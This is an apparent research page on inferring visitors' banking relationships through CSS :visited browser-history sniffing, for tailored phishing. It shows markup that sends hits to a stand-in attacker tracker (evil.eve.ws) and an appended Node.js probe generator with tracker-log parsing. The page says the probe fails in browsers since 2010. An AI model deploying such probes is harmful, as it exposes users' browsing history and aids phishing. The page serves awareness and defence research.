Phishing for Clues
Inferring Context Using Cascading Style Sheets and Browser History
Markus Jakobsson, Tom N. Jagatic, and Sid Stamm
The strongest indication consumers get that a particular phishing email is not legitimate is that it is "sent by" an institution they have no relationship with. For example, a person who banks with CitiBank and AmeriTrade is not going to believe an email appearing to be sent by Chase or etrade asking him or her to confirm a password. To improve their yield, phishers are likely to try to automatically extract as much information as they can about their victims, and then target them in ways that are consistent with that context. More concretely, if a phisher could determine a victim's banking relationships, he would not have to spoof the "wrong" entities when targeting that victim. Alarmingly, this is rather straightforward to do, and hard to protect against.
A simple technique lets a web site examine the browser history of an unsuspecting visitor using Cascading Style Sheets. This technique is particularly worrisome in the problem domain of phishing. Phishers typically send massive amounts of bulk email hoping their lure will be successful; given greater context, such lures can be tailored far more effectively, even into a context-aware phishing attack. It should be emphasized that the following attack can be launched from any arbitrary web site and is embedded entirely in HTML and CSS markup. Many web browsers are susceptible.
Cascading Style Sheets (CSS) is a stylesheet language used to describe the presentation of a document written in a markup language such as HTML. The CSS :visited pseudo-class can be used in the following manner to notify a phisher, Eve, whether Alice has visited the web page http://some.bank.com/login. The #foo:visited rule in this example sets the background property of the link with id "foo" to reference Eve's tracking application at http://evil.eve.ws/tracker. The browser applies that rule, and therefore fetches the tracker URL, only if http://some.bank.com/login appears in the history of Alice's web browser; the absence of a request tells Eve the page was not visited.
<head>
  [...]
  <style type="text/css">
    /* Applied only if http://some.bank.com/login is in Alice's history;
       the browser then fetches the "background image" from Eve's tracker. */
    #foo:visited {
      background: url(http://evil.eve.ws/tracker?who=alice&what=somebank);
    }
  </style>
</head>
<body>
  <a id="foo" href="http://some.bank.com/login"></a>
</body>

A similar technique exploits the time required to perform certain web browser operations, namely cache hits and misses on targeted content: a resource the victim has already fetched loads measurably faster than one that must be retrieved from the network. Felten and Schneider describe this approach in Timing Attacks on Web Privacy (ACM CCS 2000).
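As an added example (not code from the original page or its authors), the following Node.js script generalizes the markup above to a whole list of candidate login URLs, which is how a phisher would actually "determine banking relationships", and shows the tracker side: it parses the hits Eve's server receives into a per-victim map of which sites were found in the history. The tracker URL and the some.bank.com login page come from the page; the other candidate sites, the victim identifiers and the access-log lines are constructed for this example.

```javascript
// Added example: CSS :visited history probe generator plus tracker-side
// inference. Not from the original page; hosts other than
// some.bank.com and evil.eve.ws are made up for illustration.

const TRACKER = "http://evil.eve.ws/tracker"; // Eve's tracker, as on the page

// Constructed candidate list: label -> login URL the victim may have visited.
const CANDIDATES = {
  somebank: "http://some.bank.com/login",
  otherbank: "http://other.bank.example/signin",   // assumed
  broker: "http://broker.example/account/login",  // assumed
};

// Escape a string for safe use inside a double-quoted HTML attribute.
function escapeAttr(s) {
  return s.replace(/&/g, "&amp;").replace(/"/g, "&quot;").replace(/</g, "&lt;");
}

// Build one #id:visited rule and one anchor per candidate. A susceptible
// browser applies a rule, and so fetches its background URL from the tracker,
// only for anchors whose href is already in the victim's history.
function buildProbe(victim, candidates) {
  const rules = [];
  const anchors = [];
  for (const [label, url] of Object.entries(candidates)) {
    const id = `probe-${label}`;
    const hit =
      `${TRACKER}?who=${encodeURIComponent(victim)}` +
      `&what=${encodeURIComponent(label)}`;
    rules.push(`#${id}:visited { background: url("${hit}"); }`);
    anchors.push(`<a id="${id}" href="${escapeAttr(url)}"></a>`);
  }
  return [
    '<style type="text/css">',
    ...rules,
    "</style>",
    ...anchors,
  ].join("\n");
}

// Tracker side: every GET /tracker?who=...&what=... is one positive answer.
// Turn access-log lines into { victim: [labels found in history] }.
function parseHits(logLines) {
  const seen = {};
  for (const line of logLines) {
    const m = line.match(/GET \/tracker\?([^ "]+)/);
    if (!m) continue; // unrelated request (favicon, bots, ...)
    const params = new URLSearchParams(m[1]);
    const who = params.get("who");
    const what = params.get("what");
    if (!who || !what) continue;
    if (!seen[who]) seen[who] = new Set();
    seen[who].add(what);
  }
  const result = {};
  for (const [who, labels] of Object.entries(seen)) {
    result[who] = [...labels].sort();
  }
  return result;
}

// Constructed sample of what Eve's web server log might contain after
// Alice and Bob open the probe page.
const SAMPLE_LOG = [
  '10.0.0.5 - - [01/Jan/2006:10:00:00 +0000] "GET /tracker?who=alice&what=somebank HTTP/1.1" 200 43',
  '10.0.0.5 - - [01/Jan/2006:10:00:00 +0000] "GET /tracker?who=alice&what=broker HTTP/1.1" 200 43',
  '10.0.0.9 - - [01/Jan/2006:10:00:02 +0000] "GET /tracker?who=bob&what=otherbank HTTP/1.1" 200 43',
  '10.0.0.9 - - [01/Jan/2006:10:00:02 +0000] "GET /favicon.ico HTTP/1.1" 404 0',
];
```

Running `buildProbe("alice", CANDIDATES)` yields the style block and three empty anchors to embed in Eve's page; `parseHits(SAMPLE_LOG)` then reports that alice has visited somebank and broker, and bob only otherbank, which is exactly the context a targeted lure needs. A practitioner should note that this specific probe no longer works in current browsers: since 2010 (Firefox 4, Chrome 6) browsers restrict :visited to color changes, never load resources on its account, and report the unvisited style to scripts, so the tracker request is never made.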
To learn more about possible countermeasures, please read our paper (pdf) or send us an email.